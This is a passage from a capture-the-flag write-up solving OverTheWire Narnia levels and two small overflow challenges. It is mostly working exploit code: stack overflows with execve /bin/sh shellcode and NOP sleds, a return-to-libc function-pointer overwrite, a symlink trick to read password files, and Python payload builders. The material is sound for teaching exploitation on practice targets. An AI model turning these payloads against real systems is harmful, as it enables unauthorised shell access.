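child_env = dict(os.environb)  # bytes view of the environment (Unix only)
child_env[b"EGG"] = shellcode
# subprocess.run(["/narnia/narnia1"], env=child_env) would start the target (path assumed).
```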

  • Another example is Narnia2:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char * argv[]){
    char buf[128];

    if(argc == 1){
        printf("Usage: %s argument\n", argv[0]);
        exit(1);
    }
    strcpy(buf,argv[1]);
    printf("%s", buf);

    return 0;
}

It’s easy to see that a buffer overflow vulnerability exists because of strcpy. Let’s find the offset of the saved return address.

ulimit -c unlimited
./narnia2 `/usr/share/metasploit-framework/tools/pattern_create.rb 200`
Segmentation fault (core dumped)

gdb -q -c core ./narnia2
#0  0x37654136 in ?? ()

/usr/share/metasploit-framework/tools/pattern_offset.rb 0x37654136
[*] Exact match at offset 140

narnia2@melinda:~$ gdb -q /narnia/narnia2
(gdb) disassemble main
Dump of assembler code for function main:
**Snip**
   0x080484a0 <+67>:    mov    %eax,(%esp)
   0x080484a3 <+70>:    call   0x8048320 <strcpy@plt>
**Snip**
End of assembler dump.
(gdb) br *main+70
Breakpoint 1 at 0x80484a3
(gdb) run `python -c 'print "A"*140 + "BBBB"'`
Starting program: /games/narnia/narnia2 `python -c 'print "A"*140 + "BBBB"'`

Breakpoint 1, 0x080484a3 in main ()
(gdb) n
0x42424242 in ?? ()
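
The offset lookup does not depend on Metasploit. The Python 3 sketch below re-implements the idea with the same upper/lower/digit triple ordering (Aa0Aa1Aa2...); it is an independent illustration, not Metasploit’s code, and the function names simply mirror the tool names.

```python
import string
import struct

def pattern_create(length):
    """Build a non-repeating pattern of Upper/lower/digit triples (Aa0Aa1Aa2...)."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if 3 * len(out) >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]

def pattern_offset(value, length=8192):
    """Find where the little-endian bytes of a crashed EIP value occur in the pattern."""
    needle = struct.pack("<I", value).decode("ascii")
    return pattern_create(length).find(needle)

print(pattern_offset(0x37654136))
```

The EIP value 0x37654136 is the four pattern characters "6Ae7" read as a little-endian integer, which is why the value has to be unpacked before searching.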

Let’s see the stack after the strcpy, which would tell us the probable address we want to redirect execution.

(gdb) x/80xw $esp+400
0xffffd7e0: 0x0000000f  0xffffd80b  0x00000000  0x00000000
0xffffd7f0: 0x00000000  0x00000000  0x1d000000  0xa9c79d1b
0xffffd800: 0xe1a67367  0xc19fc850  0x6996cde4  0x00363836
0xffffd810: 0x2f000000  0x656d6167  0x616e2f73  0x61696e72
0xffffd820: 0x72616e2f  0x3261696e  0x41414100  0x41414141
0xffffd830: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd840: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd850: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd860: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd870: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd880: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd890: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd8a0: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd8b0: 0x41414141  0x42424241  0x44580042  0x45535f47
0xffffd8c0: 0x4f495353  0x44495f4e  0x3939383d  0x53003733

Let’s pick a shellcode from Shell-Storm for a Linux x86 execve /bin/sh and calculate the number of NOPs

narnia2@melinda:~$ python -c 'print len("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")'
23
narnia2@melinda:~$ bc
140-23
117
narnia2@melinda:~$ /narnia/narnia2 `python -c 'print "\x90"*117 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x50\xd8\xff\xff"'`
$ cat /etc/narnia_pass/narnia3
**********
$
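
The payload arithmetic can be written out explicitly. The Python 3 sketch below builds the same bytes as the one-liner above: a NOP sled, the shellcode, then the return address packed as little-endian. The return address is the one used above and is specific to that machine’s stack layout.

```python
import struct

OFFSET = 140            # bytes before the saved return address, found with the pattern
RET = 0xffffd850        # address inside the NOP sled, taken from the stack dump above
shellcode = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")

nop_sled = b"\x90" * (OFFSET - len(shellcode))
payload = nop_sled + shellcode + struct.pack("<I", RET)

assert b"\x00" not in payload    # strcpy stops copying at the first NUL byte
print(len(nop_sled), len(payload))
```

Landing anywhere in the sled is enough, so the return address only needs to be approximately right; this helps because the stack shifts slightly between running inside and outside gdb.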

  • Another example is Narnia3:

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv){

        int  ifd,  ofd;
        char ofile[16] = "/dev/null";
        char ifile[32];
        char buf[32];

        if(argc != 2){
                printf("usage, %s file, will send contents of file 2 /dev/null\n",argv[0]);
                exit(-1);
        }

        /* open files */
        strcpy(ifile, argv[1]);
        if((ofd = open(ofile,O_RDWR)) < 0 ){
                printf("error opening %s\n", ofile);
                exit(-1);
        }
        if((ifd = open(ifile, O_RDONLY)) < 0 ){
                printf("error opening %s\n", ifile);
                exit(-1);
        }

        /* copy from file1 to file2 */
        read(ifd, buf, sizeof(buf)-1);
        write(ofd,buf, sizeof(buf)-1);
        printf("copied contents of %s to a safer place... (%s)\n",ifile,ofile);

        /* close 'em */
        close(ifd);
        close(ofd);

        exit(1);
}

Superkojiman notes explain this best, copied here with permission, thanks superkojiman :)

narnia3@melissa:/narnia$ ./narnia3 /etc/motd
copied contents of /etc/motd to a safer place... (/dev/null)

We can use this program to read the contents of /etc/narnia_pass/narnia4, but the output is written to /dev/null. We control the input file and the output file is set as /dev/null. However, because of the way the stack is laid out, we can write past the ifile buffer and overwrite the value of ofile. This lets us replace /dev/null with another file of our choosing. Here’s what the stack looks like:

+---------+
|  ret    |
|  sfp    |
|  ofd    |
|  ifd    |
|  ofile  |
|  ifile  |
|  buf    |
+---------+ <- esp

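ifile is a 32-byte array and ofile is a 16-byte array that sits directly after it in memory, which is why 32 bytes of padding are enough to reach ofile. We can compile the program with -ggdb and examine it in gdb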

# gcc -ggdb -m32 -fno-stack-protector -Wl,-z,norelro narnia3.c -o narnia3
# gdb -q narnia3

If we disas main, we can see that strcpy is called at *main+100:

0x08048551 <+93>:    lea    0x38(%esp),%eax
0x08048555 <+97>:    mov    %eax,(%esp)
0x08048558 <+100>:   call   0x8048400 <strcpy@plt>
0x0804855d <+105>:   movl   $0x2,0x4(%esp)
0x08048565 <+113>:   lea    0x58(%esp),%eax
0x08048569 <+117>:   mov    %eax,(%esp)

We set a breakpoint there and run the program with the following arguments:

(gdb) r `python -c 'print "A"*32 + "/tmp/hack"'`
Starting program: /root/wargames/narnia/3/narnia3 `python -c 'print "A"*32 + "/tmp/hack"'`

Breakpoint 1, 0x08048558 in main (argc=2, argv=0xbffff954) at narnia3.c:37
37          strcpy(ifile, argv[1]);

At the first breakpoint, we examine the local variables

(gdb) i locals
ifd = 134514299
ofd = -1208180748
ofile = "/dev/null\000\000\000\000\000\000"
ifile = "x\370\377\277\234\203\004\b\200\020\377\267\214\230\004\b\250\370\377\277\211\206\004\b$\243\374\267\364\237", <incomplete sequence \374\267>
buf = "\370\370\377\267\364\237\374\267\371\234\367\267\245B\352\267h\370\377\277չ\350\267\364\237\374\267\214\230\004\b"

ofile is set to /dev/null as expected. We’ll step to the next instruction and check again.

 (gdb) s
 38          if((ofd = open(ofile,O_RDWR)) < 0 ){
 (gdb) i locals
 ifd = 134514299
 ofd = -1208180748
 ofile = "/tmp/hack\000\000\000\000\000\000"
 ifile = 'A' <repeats 32 times>
 buf = "\370\370\377\267\364\237\374\267\371\234\367\267\245B\352\267h\370\377\277չ\350\267\364\237\374\267\214\230\004\b"
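
The effect of that single strcpy can be reproduced with a small memory model. The Python 3 sketch below assumes ofile starts exactly 32 bytes after ifile, as in the locally compiled binary; strcpy and c_string are toy helpers, not the libc functions.

```python
def strcpy(memory, dest, src):
    """Copy src plus a terminating NUL into memory at dest, with no bounds check."""
    data = src + b"\x00"
    memory[dest:dest + len(data)] = data

def c_string(memory, start):
    """Read a NUL-terminated string starting at `start`."""
    return bytes(memory[start:memory.index(0, start)])

IFILE, OFILE = 0, 32                     # ifile[32] is followed directly by ofile[16]
memory = bytearray(48)
memory[OFILE:OFILE + 10] = b"/dev/null\x00"

strcpy(memory, IFILE, b"A" * 32 + b"/tmp/hack")

print(c_string(memory, IFILE))
print(c_string(memory, OFILE))
```

Since ifile has no terminator of its own any more, reading it as a C string runs on into ofile, which is why the input path ends in /tmp/hack too.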

As expected, ofile has been overwritten to /tmp/hack. However ifile is now AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp/hack so in order to read /etc/narnia_pass/narnia4, we need to create a directory AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp and symlink /etc/narnia_pass/narnia4 to AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp/hack
narnia3@melissa:/tmp/skojiman3$ mkdir -p AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp
narnia3@melissa:/tmp/skojiman3$ ln -s /etc/narnia_pass/narnia4 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp/hack

Next we need to create the output file /tmp/hack that ofile points to

narnia3@melissa:/tmp/skojiman3$ touch /tmp/hack
narnia3@melissa:/tmp/skojiman3$ chmod 666 /tmp/hack
narnia3@melissa:/tmp/skojiman3$ ls -l /tmp/hack
-rw-rw-rw- 1 narnia3 narnia3 0 2012-11-24 22:58 /tmp/hack

Finally, execute /narnia/narnia3 as follows:

narnia3@melissa:/tmp/skojiman3$ /narnia/narnia3 `python -c 'print "A"*32 + "/tmp/hack"'`
copied contents of AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp/hack to a safer place... (/tmp/hack)
narnia3@melissa:/tmp/skojiman3$ cat /tmp/hack
thaenohtai
[non-printable bytes left over in buf]narnia3@melissa:/tmp/skojiman3$

  • Let’s see another example, Narnia6.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

// tired of fixing values...
// - morla
unsigned long get_sp(void) {
       __asm__("movl %esp,%eax\n\t"
               "and $0xff000000, %eax"
               );
}

int main(int argc, char *argv[]){
    char b1[8], b2[8];
    int  (*fp)(char *)=(int(*)(char *))&puts, i;

    if(argc!=3){ printf("%s b1 b2\n", argv[0]); exit(-1); }

    /* clear environ */
    for(i=0; environ[i] != NULL; i++)
        memset(environ[i], '\0', strlen(environ[i]));
    /* clear argz    */
    for(i=3; argv[i] != NULL; i++)
        memset(argv[i], '\0', strlen(argv[i]));

    strcpy(b1,argv[1]);
    strcpy(b2,argv[2]);
    //if(((unsigned long)fp & 0xff000000) == 0xff000000)
    if(((unsigned long)fp & 0xff000000) == get_sp())
        exit(-1);
    fp(b1);

    exit(1);
}

The stack is not executable for this binary, so it is an example of a “return-to-libc” attack. This is an attack, usually starting with a buffer overflow, in which a return address (or, as here, a function pointer) is replaced by the address of a subroutine that is already present in the process’ executable memory. This renders the NX bit feature useless (if present) and rids the attacker of the need to inject their own code.

gdb -q narnia6
Reading symbols from /home/bitvijays/narnia6...(no debugging symbols found)...done.
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : disabled
gdb-peda$

Let’s compile the source locally and check what happens:

gcc -m32 -ggdb -fno-stack-protector -Wall narnia6.c -o narnia61

In the gdb session below we pass "A"*8 + "BBBB" as the first argument and "C"*8 + "DDDD" as the second, and break on the call eax instruction:

gdb -q ./narnia61
gdb-peda$ pdisass main
Dump of assembler code for function main:
   0x080486d2 <+330>:   call   0x8048450 <exit@plt>
   0x080486d7 <+335>:   lea    eax,[esp+0x20]
   0x080486db <+339>:   mov    DWORD PTR [esp],eax
   0x080486de <+342>:   mov    eax,DWORD PTR [esp+0x28]
   0x080486e2 <+346>:   call   eax
   0x080486e4 <+348>:   mov    DWORD PTR [esp],0x1
   0x080486eb <+355>:   call   0x8048450 <exit@plt>
End of assembler dump.
gdb-peda$ br *main+346
Breakpoint 1 at 0x80486e2: file narnia6.c, line 48.
gdb-peda$ run `python -c 'print "A"*8 + "BBBB" + " " + "C"*8 + "DDDD"'`
[-------------------------------------code-------------------------------------]
   0x80486d7 <main+335>:    lea    eax,[esp+0x20]
   0x80486db <main+339>:    mov    DWORD PTR [esp],eax
   0x80486de <main+342>:    mov    eax,DWORD PTR [esp+0x28]
=> 0x80486e2 <main+346>:    call   eax
   0x80486e4 <main+348>:    mov    DWORD PTR [esp],0x1
   0x80486eb <main+355>:    call   0x8048450 <exit@plt>
   0x80486f0 <__libc_csu_fini>: push   ebp
   0x80486f1 <__libc_csu_fini+1>:   mov    ebp,esp
Guessed arguments:
arg[0]: 0xffffd380 ("DDDD")
Breakpoint 1, 0x080486e2 in main (argc=0x3, argv=0xffffd444) at narnia6.c:48
48      fp(b1);
gdb-peda$ p b1
$1 = "DDDD\000AAA"
gdb-peda$ p b2
$2 = "CCCCCCCC"
gdb-peda$ p puts
$3 = {<text variable, no debug info>} 0xf7eb3360 <puts>
gdb-peda$ p system
$4 = {<text variable, no debug info>} 0xf7e8bc30 <system>
gdb-peda$ p &b1
$5 = (char (*)[8]) 0xffffd380
gdb-peda$ x/50xw 0xffffd350
0xffffd360: 0xffffd380  0xffffd5df  0x0000003b  0x0804874b
0xffffd370: 0x00000003  0xffffd444  0x43434343  0x43434343
0xffffd380: 0x44444444  0x41414100  0x42424242  0x00000000
0xffffd390: 0x08048700  0xf7fb0ff4  0xffffd418  0xf7e66e46
0xffffd3a0: 0x00000003  0xffffd444  0xffffd454  0xf7fde860
gdb-peda$ p fp
$6 = (int (*)(char *)) 0x42424242
gdb-peda$ p &fp
$7 = (int (**)(char *)) 0xffffd388
gdb-peda$ p $fp
$8 = (void *) 0xffffd398

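The address of fp (“p &fp”) is 0xffffd388 and it holds the value (“p fp”) 0x42424242, so the BBBB from the first argument has overwritten the function pointer. As noted before, the stack is not executable, but the program is linked against libc, which provides system() at (“p system”) 0xf7e8bc30 on this machine. Furthermore, the second argument overflows b2 into b1: DDDD and its terminating null byte overwrite the AAAA at the start of b1. So if fp points to system() and b1 holds “/bin/sh”, the call fp(b1) becomes system("/bin/sh"). The exploit below uses 0xf7e61c40, the address of system() on the target machine: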

narnia6@melinda:/narnia$ ./narnia6 `python -c 'print "A"*8 + "\x40\x1c\xe6\xf7" + " " + "C"*8 + "/bin/sh"'`
$ cat /etc/narnia_pass/narnia7
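The two arguments used above can also be built programmatically. The following is a minimal sketch in Python 3 (unlike the Python 2 one-liners in this post). It assumes the layout seen in gdb, with b2, b1 and fp each 8 bytes apart, and takes the address of system() as a parameter because it differs between machines. narnia6_args is a hypothetical helper name.

```python
import struct

def narnia6_args(system_addr, command=b"/bin/sh"):
    """Return (argv1, argv2) for the narnia6 overflow.

    Assumes b2, b1 and fp are laid out 8 bytes apart, as in the gdb dump.
    """
    # argv[1] fills b1 (8 bytes) and then overwrites fp with system()
    arg1 = b"A" * 8 + struct.pack("<I", system_addr)
    # argv[2] fills b2 (8 bytes) and spills the command string into b1
    arg2 = b"C" * 8 + command
    return arg1, arg2

arg1, arg2 = narnia6_args(0xf7e61c40)
print(arg1, arg2)
```

The second strcpy runs after the first one, which is why the command has to travel in argv[2]: it is the last thing written into b1 before fp(b1) is called.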
  • Let’s see another example, Narnia8, where we have to use an environment variable to invoke a shell.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// gcc's variable reordering fucked things up
// to keep the level in its old style i am
// making "i" global unti i find a fix
// -morla
int i;

void func(char *b){
    char *blah=b;
    char bok[20];
    //int i=0;

    memset(bok, '\0', sizeof(bok));
    for(i=0; blah[i] != '\0'; i++)
        bok[i]=blah[i];

    printf("%s\n",bok);
}

int main(int argc, char **argv){

    if(argc > 1)
        func(argv[1]);
    else
    printf("%s argument\n", argv[0]);

    return 0;
}

Let’s see what is happening here: the for loop in func copies data from blah to the bok character array until a null character is found. Let’s see what the stack looks like:

<bok character array><blah pointer><fp><ret><pointer b>

Let’s confirm this using gdb. We put a breakpoint on the printf call in func.

0xffffd670: 0x08048580  0xffffd688  0x00000014  0xf7e54f53
0xffffd680: 0x00000000  0x00ca0000  0x41414141  0x41414141
0xffffd690: 0x41414141  0x41414141  0x00414141  0xffffd8b1
0xffffd6a0: 0x00000002  0xffffd764  0xffffd6c8  0x080484cd
0xffffd6b0: 0xffffd8b1  0xf7ffd000  0x080484fb  0xf7fca000

Address 0xffffd688 marks the start of the character buffer bok. I entered 19 A’s, so it holds 0x41 19 times followed by the null byte 0x00. Next comes 0xffffd8b1 (the value of the blah pointer), followed by 12 bytes that include the saved frame pointer <0x00000002 0xffffd764 0xffffd6c8>, followed by 0x080484cd, which is the return address

(gdb) x/s 0x080484cd
0x80484cd <main+31>:    "\353\025\213E\f\213"

followed by pointer b (0xffffd8b1). Let’s see what’s at location 0xffffd8b1

(gdb) x/20wx 0xffffd8b1
0xffffd8b1: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd8c1: 0x00414141  0x5f474458  0x53534553  0x5f4e4f49

Let’s see what happens when we enter more than 19 characters (the size of bok minus 1 byte for the null character):

narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20'`
AAAAAAAAAAAAAAAAAAAA����
narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20'` | hexdump
0000000 4141 4141 4141 4141 4141 4141 4141 4141
0000010 4141 4141 d8bf ffff 0a02
000001a

As expected, we get the A’s followed by some garbage, which is the address blah is pointing to. We know that we can overwrite the RET address with

# `python -c 'print "A"*20 + "\x90\x90\x90\x90" + "A"*12 + "BBBB"'`

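Let’s see what happens when we do this. After copying the 20 A’s, it copies the first \x90 over the lowest byte of the blah pointer, so it changes from 0xffffd8bf to 0xffffd890 (from 0xffffd89c to 0xffffd890 in the gdb session below). Because of the for loop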

for(i=0; blah[i] != '\0'; i++)

It now copies characters relative to 0xffffd890, i.e. from 0xffffd890 + i. Suppose the next character it copies is 0x41. The pointer then becomes 0xffff4190, and the for loop continues from that address until a null character is found.

(gdb) x/20xw $esp
0xffffd660: 0xffffd678  0x00000000  0x00000014  0xf7e54f53
0xffffd670: 0x00000000  0x00ca0000  0x41414141  0x41414141
0xffffd680: 0x41414141  0x41414141  0x41414141  0xffffd890
0xffffd690: 0x00000002  0xffffd754  0xffffd6b8  0x080484cd
0xffffd6a0: 0xffffd89c  0xf7ffd000  0x080484fb  0xf7fca000

(gdb) x/10xw 0xffffd890
0xffffd890: 0x2f61696e  0x6e72616e  0x00386169  0x41414141
0xffffd8a0: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd8b0: 0x90909090  0x41414141

(gdb) x/20xw $esp
0xffffd660: 0x08048580  0xffffd678  0x00000014  0xf7e54f53
0xffffd670: 0x00000000  0x00ca0000  0x41414141  0x41414141
0xffffd680: 0x41414141  0x41414141  0x41414141  0xffff4190
0xffffd690: 0x00000002  0xffffd754  0xffffd6b8  0x080484cd
0xffffd6a0: 0xffffd89c  0xf7ffd000  0x080484fb  0xf7fca000

(gdb) x/10xw 0xffff4190
0xffff4190: 0x00000000  0x00000000  0x00000000  0x00000000
0xffff41a0: 0x00000000  0x00000000  0x00000000  0x00000000
0xffff41b0: 0x00000000  0x00000000
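The pointer corruption seen in these dumps can be replayed in a small model. The sketch below (Python 3) is only an illustration under stated assumptions: a toy 4 KB window stands in for the top of the stack, reads outside that window return 0 (like the zero-filled memory seen at 0xffff4190), and BOK and ARG are the addresses taken from the gdb session. replay is a hypothetical helper name.

```python
import struct

BASE = 0xffffd000          # toy window standing in for the top of the stack
BOK = 0xffffd678           # start of bok, taken from the gdb dump
ARG = 0xffffd89c           # where argv[1] lives in that gdb run

def replay(payload):
    """Replay func()'s copy loop; return (final i, final value of blah)."""
    mem = bytearray(0x1000)
    mem[ARG - BASE:ARG - BASE + len(payload)] = payload
    slot = BOK + 20                                   # blah sits right after bok[20]
    struct.pack_into("<I", mem, slot - BASE, ARG)     # blah = b

    def read(addr):
        idx = addr - BASE
        return mem[idx] if 0 <= idx < len(mem) else 0  # outside the window reads as 0

    i = 0
    while i < 64:                                     # safety cap for the sketch
        blah = struct.unpack_from("<I", mem, slot - BASE)[0]  # re-read on every pass
        byte = read(blah + i)
        if byte == 0:
            break
        mem[BOK + i - BASE] = byte                    # bok[i] = blah[i]
        i += 1
    return i, struct.unpack_from("<I", mem, slot - BASE)[0]

tail = b"A" * 12 + b"BBBB"
bad = replay(b"A" * 20 + b"\x90" * 4 + tail)               # pointer gets corrupted
good = replay(b"A" * 20 + struct.pack("<I", ARG) + tail)   # pointer keeps its value
print(bad[0], hex(bad[1]), good[0], hex(good[1]))
```

With the \x90 bytes the loop stops after 22 bytes with blah equal to 0xffff4190, while writing blah's own value back lets all 40 bytes through.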

If we can somehow keep the blah pointer at its original value, we can go on to overwrite the RET pointer (12 bytes further on). Let’s see what 0xffffd89c, the original value of blah in gdb, points to when we use

`python -c 'print "A"*20 + "\x90\x90\x90\x90" + "A"*12 + "BBBB"'`
(gdb) x/30xw 0xffffd89c
0xffffd89c: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd8ac: 0x41414141  0x90909090  0x41414141  0x41414141
0xffffd8bc: 0x41414141  0x42424242  0x47445800  0x5345535f

When we put this address in place of the \x90 bytes, we are able to overwrite RET with BBBB. Now, we control the EIP :)

(gdb) run `python -c 'print "A"*20 + "\x9c\xd8\xff\xff" + "A"*12 + "BBBB"'`


(gdb) x/20xw $esp
0xffffd660: 0x08048580  0xffffd678  0x00000014  0xf7e54f53
0xffffd670: 0x00000000  0x00ca0000  0x41414141  0x41414141
0xffffd680: 0x41414141  0x41414141  0x41414141  0xffffd89c
0xffffd690: 0x41414141  0x41414141  0x41414141  0x42424242
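As a sketch, the payload can be expressed as a function of the two addresses involved (Python 3; narnia8_payload is a hypothetical helper name, and the 20 + 4 + 12 + 4 layout is the one observed in the dumps above).

```python
import struct

def narnia8_payload(blah_addr, ret_addr):
    """bok filler, blah rewritten with its own value, 12 filler bytes, new return address."""
    return (b"A" * 20
            + struct.pack("<I", blah_addr)   # keep blah pointing at our argument
            + b"A" * 12                      # bytes between blah and the return address
            + struct.pack("<I", ret_addr))   # value that ends up in EIP

payload = narnia8_payload(0xffffd89c, 0x42424242)
print(payload)
```

Keeping the two addresses as parameters makes it easy to regenerate the payload when the stack shifts between gdb and a normal run.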

Let’s export a shellcode in an environment variable, check its address on the stack and redirect the flow of the program to it. Notice the number of NOPs we have put in, both for easy identification and for reachability.

export EGG=`python -c 'print "\x90"*90 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"'`

Searching the stack for our environment variable, we find its NOP sled around address 0xffffd8d4.

(gdb) x/100xw $esp+500
0xffffd7e4: 0x0000000f  0xffffd80b  0x00000000  0x00000000
0xffffd7f4: 0x00000000  0xde000000  0x1a2a5992  0xf11444ea
0xffffd804: 0x11433cf3  0x694a71a2  0x00363836  0x672f0000
0xffffd814: 0x73656d61  0x72616e2f  0x2f61696e  0x6e72616e
0xffffd824: 0x00386169  0x41414141  0x41414141  0x41414141
0xffffd834: 0x41414141  0x41414141  0xffffd828  0x41414141
0xffffd844: 0x41414141  0x41414141  0x42424242  0x47445800
0xffffd854: 0x5345535f  0x4e4f4953  0x3d44495f  0x35343239
0xffffd864: 0x45485300  0x2f3d4c4c  0x2f6e6962  0x68736162
0xffffd874: 0x52455400  0x74783d4d  0x006d7265  0x5f485353
0xffffd884: 0x45494c43  0x353d544e  0x34392e39  0x2e31362e
0xffffd894: 0x20343731  0x37373835  0x32322032  0x48535300
0xffffd8a4: 0x5954545f  0x65642f3d  0x74702f76  0x31312f73
0xffffd8b4: 0x5f434c00  0x3d4c4c41  0x47450043  0x90903d47
0xffffd8c4: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd8d4: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd8e4: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd8f4: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd904: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd914: 0x90909090  0x90909090  0x99580b6a  0x2f2f6852
0xffffd924: 0x2f686873  0x896e6962  0xcdc931e3  0x53550080
0xffffd934: 0x6e3d5245  0x696e7261  0x4c003861  0x4f435f53
0xffffd944: 0x53524f4c  0x3d73723d  0x69643a30  0x3b31303d
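To double-check that 0xffffd8d4 really falls inside the NOP sled, the little-endian words printed by gdb can be turned back into bytes. This is a small Python 3 sketch. The row values are copied from the dump above, words_to_bytes is a hypothetical helper name, and the sled length of 90 comes from the export command.

```python
import struct

def words_to_bytes(words):
    """Turn 32-bit words as printed by gdb's x/xw back into memory byte order."""
    return b"".join(struct.pack("<I", w) for w in words)

# Row 0xffffd8b4 of the dump: the end of LC_ALL=C, then "EGG=" and the first NOPs
row_addr = 0xffffd8b4
row = words_to_bytes([0x5f434c00, 0x3d4c4c41, 0x47450043, 0x90903d47])

sled_start = row_addr + row.index(b"EGG=") + len(b"EGG=")
sled_end = sled_start + 90                 # 90 NOPs were exported
print(hex(sled_start), hex(sled_end))
print(sled_start <= 0xffffd8d4 < sled_end)
```

The computed end of the sled matches the position of 0x99580b6a in the dump, which is the first word of the shellcode.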

Let’s redirect our program to 0xffffd8d4 to get the shell

(gdb) run `python -c 'print "A"*20 + "\x28\xd8\xff\xff" + "A"*12 + "\xd4\xd8\xff\xff"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /games/narnia/narnia8 `python -c 'print "A"*20 + "\x28\xd8\xff\xff" + "A"*12 + "\xd4\xd8\xff\xff"'`

Breakpoint 1, 0x080484a7 in func ()
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAA(���AAAAAAAAAAAA����(���
process 19900 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.
Error in re-setting breakpoint 1: No symbol "func" in current context.
Error in re-setting breakpoint 1: No symbol "func" in current context.
Error in re-setting breakpoint 1: No symbol "func" in current context.
$

Trying this without gdb didn’t work because the address of the argument string changes:

narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20 + "\x28\xd8\xff\xff" + "B"*12 + "\xd4\xd8\xff\xff"'`
AAAAAAAAAAAAAAAAAAAA(A��
narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20 + "\x28\xd8\xff\xff" + "B"*12 + "\xd4\xd8\xff\xff"'` | hexdump
0000000 4141 4141 4141 4141 4141 4141 4141 4141
0000010 4141 4141 4128 ffff 0a02
000001a

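Changing 28 to 0a gave me, just by chance, the correct address for blah. 0x0a is a newline, so the shell most likely splits the argument there and the program receives only the 20 A’s. The bytes printed after them are then the real value of blah (0xffffd837):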

narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20 + "\x0a\xd8\xff\xff" + "B"*12 + "\xd4\xd8\xff\xff"'` | hexdump
0000000 4141 4141 4141 4141 4141 4141 4141 4141
0000010 4141 4141 d837 ffff 0a03
narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20 + "\x37\xd8\xff\xff" + "B"*12 + "\xd4\xd8\xff\xff"'`
AAAAAAAAAAAAAAAAAAAA7���BBBBBBBBBBBB����7���
$
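The leaked pointer can also be pulled out of the program output directly instead of reading it off hexdump, which prints 16-bit little-endian words. A minimal Python 3 sketch follows. The sample bytes are reconstructed from the hexdump above, and leaked_blah is a hypothetical helper name.

```python
import struct

def leaked_blah(output):
    """Extract the blah pointer that printf leaks right after the 20 copied bytes."""
    return struct.unpack_from("<I", output, 20)[0]

# "4141 ... d837 ffff 0a03" in hexdump notation corresponds to these raw bytes
out = b"A" * 20 + bytes.fromhex("37d8ffff") + b"\x03\n"
print(hex(leaked_blah(out)))
```

The value returned here is the one that goes into the payload in place of the guessed \x28\xd8\xff\xff.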

For example, below you need the address of secret to write the new value 0x1337beef.

unsigned secret = 0xdeadbeef;

int main(int argc, char **argv){
    unsigned *ptr;
    unsigned value;
    char key[33];
    FILE *f;
    printf("Welcome! I will grant you one arbitrary write!\n");
    printf("Where do you want to write to? ");
    scanf("%p", &ptr);
    printf("Okay! What do you want to write there? ");
    scanf("%p", (void **)&value);
    printf("Writing %p to %p...\n", (void *)value, (void *)ptr);
    *ptr = value;
    printf("Value written!\n");
    if (secret == 0x1337beef){
        printf("Woah! You changed my secret!\n");
        printf("I guess this means you get a flag now...\n");

        f = fopen("flag.txt", "r");
        fgets(key, 32, f);
        fclose(f);
        puts(key);
        exit(0);
    }
    printf("My secret is still safe! Sorry.\n");
}
  • In another challenge, shown below, it is easy to see that the value of secret can be changed by entering 16 characters followed by 0xc0deface. As 0xc0deface can’t be typed as printable ASCII characters, you can use python to pass the input.

python -c 'print "A" * 16 + "\xc0\xde\xfa\xce"' or python -c 'print "A" * 16 + "\xce\xfa\xde\xc0"', depending on the endianness of the system (the second form is the little-endian one used on x86).
void give_shell(){
     gid_t gid = getegid();
     setresgid(gid, gid, gid);
     system("/bin/sh -i");
}

void vuln(char *input){
     char buf[16];
     int secret = 0;
     strcpy(buf, input);

     if (secret == 0xc0deface){
         give_shell();
     }else{
         printf("The secret is %x\n", secret);
     }
}

int main(int argc, char **argv){
     if (argc > 1)
         vuln(argv[1]);
     return 0;
}
